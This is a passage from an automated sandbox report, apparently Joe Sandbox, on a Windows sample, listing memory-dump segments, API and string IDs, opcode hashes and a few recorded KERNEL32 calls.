                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ObjectProcessSingleTerminateWait
                                                  • String ID: pth_unenc
                                                  • API String ID: 1872346434-4028850238
                                                  • Opcode ID: 0bcc8583bbfeaf574487765c88b71504591df5916e82e2463f0204abfb9b1fb3
                                                  • Instruction ID: 4302d9c34f7b4dbdac7fc8682473a51625df35810590c52ad239c14707b44b4b
                                                  • Opcode Fuzzy Hash: 0bcc8583bbfeaf574487765c88b71504591df5916e82e2463f0204abfb9b1fb3
                                                  • Instruction Fuzzy Hash: C1D0C938559211AFD7614B68BC08B453B6AA745222F108277F828413F1C72598A4AE1C
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CommandLine
                                                  • String ID: H%Y
                                                  • API String ID: 3253501508-2072788189
                                                  • Opcode ID: 2702c5f118dd3839dbc4dd886e2cdb728e5ea39e06e223ea52f31eba807d30e7
                                                  • Instruction ID: 13d69598d350970c9b91df73096b24a53109b9b907d0ea4b726438dfa3130670
                                                  • Opcode Fuzzy Hash: 2702c5f118dd3839dbc4dd886e2cdb728e5ea39e06e223ea52f31eba807d30e7
                                                  • Instruction Fuzzy Hash: 09B0027D8157009FC7419F79BD5D1443BA0B75861339094B5DC19C7B35DA358085EF18
                                                  APIs
                                                  • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401AD8), ref: 0043FAF4
                                                  • GetLastError.KERNEL32 ref: 0043FB02
                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0043FB5D
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ByteCharMultiWide$ErrorLast
                                                  • String ID:
                                                  • API String ID: 1717984340-0
                                                  • Opcode ID: a3a9a9c7793c2081db5377885f607edf127f94d6c053b0090e31d102b176707d
                                                  • Instruction ID: ecac45699e256c48587d6f27f66036641a8fb520bb473c9b2adecd150689d728
                                                  • Opcode Fuzzy Hash: a3a9a9c7793c2081db5377885f607edf127f94d6c053b0090e31d102b176707d
                                                  • Instruction Fuzzy Hash: 65414871E00206AFCF258F65C854ABBFBA4EF09310F1451BAF858973A1DB38AD09C759